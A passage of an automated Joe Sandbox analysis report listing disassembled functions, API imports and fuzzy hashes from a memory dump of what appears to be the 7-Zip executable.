                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1415420288-0
                                                                                                                                                                                                        • Opcode ID: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                        • Instruction ID: 93ab88cf596a6c8f01a3e342aaba604d6782a41ad3a883e1cdef66042e18ca9c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f427dc0fd637152064e545b78de615cfab16b9f0d1a8ffe90308633dea3436e2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E511AFA23156C692CE31FB15F0D53AEA790E791790F9084B6CB9D47B69DF38C689CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                        • Instruction ID: cdefe8262882718632894b2197a52b9115ec2a69311dfba68c12fccf7edb7177
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEF08123303A9086DA20AB26E84026D6760EB86FB1F1883A0DF7D17B91CF24C84BC300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        • memmove.MSVCRT ref: 00B9C815
                                                                                                                                                                                                        • free.MSVCRT ref: 00B9C81D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrowfreemallocmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1097815484-0
                                                                                                                                                                                                        • Opcode ID: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
                                                                                                                                                                                                        • Instruction ID: dd3648c739d6637214833d69dadeba111c41d4306956c33c2b5b37958340c096
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff112bfad1453f99bb626e790325d578691dd91014c08a4cfe78a0c05c438efe
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B0181777025888BCB14DF26D4A156DB7A4E789F99B08C169DF054B358CA34DC8ACB90
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00B90A42
                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00B90A73
                                                                                                                                                                                                          • Part of subcall function 00B9B480: GetTickCount.KERNEL32 ref: 00B9B49E
                                                                                                                                                                                                          • Part of subcall function 00B9B480: strcmp.MSVCRT ref: 00B9B4E3
                                                                                                                                                                                                          • Part of subcall function 00B9B480: wcscmp.MSVCRT ref: 00B9B502
                                                                                                                                                                                                          • Part of subcall function 00B9B480: strcmp.MSVCRT ref: 00B9B568
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3267814326-0
                                                                                                                                                                                                        • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                        • Instruction ID: 30443f5ced1bbabc4f7d9d83de31c72a4af706548a1a503c09aea446841a1a21
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68F05E62210A5082EB109F24E8457A97364E744FB5F144335DE7D477E4CF38859AC354
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                        • Instruction ID: 6771098050e05e211d2f2661e497b708e16010cfaa312c18f11bfc2bc2197ba2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80E0A72221694051CE20EB20E40105A67A0E7C67F5B4423D1BEBF137F9CE28C24ECF00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrowmalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2436765578-0
                                                                                                                                                                                                        • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                        • Instruction ID: f07ab3c5967088b0735ace7c0010e634febcf8c597a42d9150339575e7606bb2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6D01250B2B685E1DE04A75498823157BA0A799750F905095E65A41725DB5CC18FCB05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                        • Instruction ID: 1d3f27c3bd769231b609f7e65a0c98f2974874413a5d595c804a8e028e2906c3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A514872644EC195EB72CF25C4806ED3BA1F389F98F6941B6CE9A4A719DF28C885C710
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteString
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 4236320881-0
                                                                                                                                                                                                        • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                        • Instruction ID: c6c7d3ed1452256f7d050177b084a434d7bd52e26f4ec2b309f903c4a832c6b4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E11821625878182E3648B28A48476A62A0E7847E4F64C360EFEF577E4EF3CCD85C705
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B58A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00B58E1D), ref: 00B58A99
                                                                                                                                                                                                          • Part of subcall function 00B58A60: GetLastError.KERNEL32(?,?,00000003,?,00B58E1D), ref: 00B58AA6
                                                                                                                                                                                                        • SetEndOfFile.KERNELBASE ref: 00B58CC7
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$ErrorLastPointer
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 841452515-0
                                                                                                                                                                                                        • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                        • Instruction ID: 5ce7318c7ea5d35c1fc34440aaf8fb567d84fc68a3e22678521f60c2d8c0601b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FAE02612301494C2E7209BE1A48176A8390EB447E2F4890F1AE4563B488E658CDE8710
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B56464: FreeLibrary.KERNELBASE(?,?,?,00B564E7), ref: 00B56475
                                                                                                                                                                                                        • LoadLibraryExW.KERNELBASE ref: 00B564F4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Library$FreeLoad
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 534179979-0
                                                                                                                                                                                                        • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                        • Instruction ID: 474b0b9caf3629c2d50ec0ec9064cbcd9cee55bdab97159ffbbc219064811c32
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AD02E11B0066582EE102BA6788136803402F15BE2FC8C0F09F0A43310EF280CEFA300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                                                                        • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                        • Instruction ID: aef7306c4a8ba29503055d82c430c4c7f9fbf69626bd2a171a565aedde401be9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0AE04676224640CBE740CF60E400B5AB3A0F388B28F000115DE8A83B54CBBCC054CF40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(?,?,?,00B564E7), ref: 00B56475
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                                                                        • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                        • Instruction ID: f5f11c2b4199f687626181ea6c46c8a7bac37b96402f7bb7308d061639fa6f0c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2D012A2702504C5FF554FB2E8543352394AB58F56F9C5090CE158B340EB2988998760
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                        • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                        • Instruction ID: 3f1f0a433edeac1229a6b36fbe921e3e0beecc0e3664999c28a7347dec98a2f1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCD01776614684C6EB008F60E04575AF764F388B64F480004EB8846774CBBCC199CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1795875747-0
                                                                                                                                                                                                        • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                        • Instruction ID: 7c0e882a86ad7830a3039534abfac8691ef186d250f28e8bc85f2458d6e653dc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93D0A9D2700B0982CE109B2AE8003692321FB88BC8F088021DE9E4B318EA2CC2498B00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseFind
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                                                                                        • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                        • Instruction ID: 9b8b91b71a655c4c5486843ae6a908af97cff60e88c594ae69f4d5ee1f91d0f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8D0A77570990181DB211FB994403242391DB54F75F180350CEB0493E0DF2484968310
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileTime
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1425588814-0
                                                                                                                                                                                                        • Opcode ID: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                        • Instruction ID: f4049b4a7dabf7f7a8015c71d24c1bc1920dddb6c1f6dd5fc36d9b7aa9e357f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27dcbfd971054ac7552dc6a0aec683e37694d7ffe7d38722d02be5010972bc1d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2B09220B12411C2CB0C6722E89232C23616788B21FE1442AC60BE5650CE1C85E94700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00B83E2A
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorExceptionLastThrowmalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2114622545-0
                                                                                                                                                                                                        • Opcode ID: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                        • Instruction ID: 01d33bea1be92c212430e3d4f99ee72f0d4676daa6895d6571350785d6df194c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4ea1d102b1c7dc8699f510d58c17edd9958139f26de21dfa11ec5a19182766b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5319C32201F4186DB15AF29E584369B7E1FB89FE1F1845B49F9A07764EF38C956C310
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
